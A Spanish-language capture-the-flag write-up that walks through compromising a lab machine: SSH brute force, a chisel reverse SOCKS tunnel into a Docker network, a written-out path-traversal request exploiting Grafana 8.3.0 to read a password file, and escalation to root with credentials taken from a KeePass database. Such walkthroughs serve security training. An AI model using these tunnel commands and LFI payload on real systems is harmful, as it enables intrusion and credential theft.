Hacemos el escaneo de nmap:
Esto corre por el puerto 80:
Hacemos fuzzing web de archivos, donde intentamos con la extensión .php:
Dentro de este /penguin.php vemos el siguiente contenido, donde se nos saluda como el usuario pinguinito y se nos dice que dentro de esta máquina hay un contenedor de docker de grafana en su versión 8.3.0, así cómo un archivo database_pass.txt en el directorio /tmp del contenedor:
Intentamos acceder por ssh mediante fuerza bruta con el usuario pinguinito, y encontramos la contraseña de love:
Entramos vía SSH:
Ejecutamos el comando hostname -I y vemos una segunda interfaz de red, que nos hace pensar que se trata de docker, tal y como se nos mostró en el puerto 80 de apache:
Para entrar dentro de esta red y sacar los contenedores que haya en su interior, tenemos que usar chisel. Por lo que lo tenemos en la máquina atacante y lo compartimos con la máquina víctima:
Una vez hecho esto, nos ponemos en escucha a modo de servidor con chisel desde la máquina atacante:
./chisel server --reverse -p 1234
Y nos conectamos desde el cliente pasando todo el tráfico a la máquina atacante:
./chisel client 192.168.0.20:1234 R:socks
Ahora desde el navegador tenemos que indicar que el tráfico pase por el túnel:
Así como asegurarnos de haber especificado dicho túnel en el archivo de configuración de Proxychains:
De tal forma que si accedemos al puerto 3000 (que es donde corre grafana por defecto) y ponemos la IP 172.17.0.2 (ya que por defecto docker crea contenedores empezando por la IP .2, luego .3, etc), podremos acceder al grafana del contenedor:
Esta versión de grafana es vulnerable a LFI, por lo que intentamos explotar esto leyendo el archivo database_pass.txt ubicado en el directorio /tmp, tal y como se nos indicó dentro del puerto 80:
proxychains curl 'http://172.17.0.2:3000/public/plugins/text/../../../../../../../../../../../../tmp/database_pass.txt' --path-as-is
Y obtenemos la contraseña de la base de datos:
supermegastrongpasswordpenguin
Nos traemos la base de datos a nuestra máquina atacante:
La abrimos con keepass, por tanto primero vamos a instalar el cliente desde flatpak:
Accedemos a las credenciales del usuario ballenasio:
ballenasio:secureballenasio
Y vemos que funcionan:
Además, este usuario está dentro del grupo sudo, por lo que si volvemos a poner la misma contraseña ya llegamos a root:



















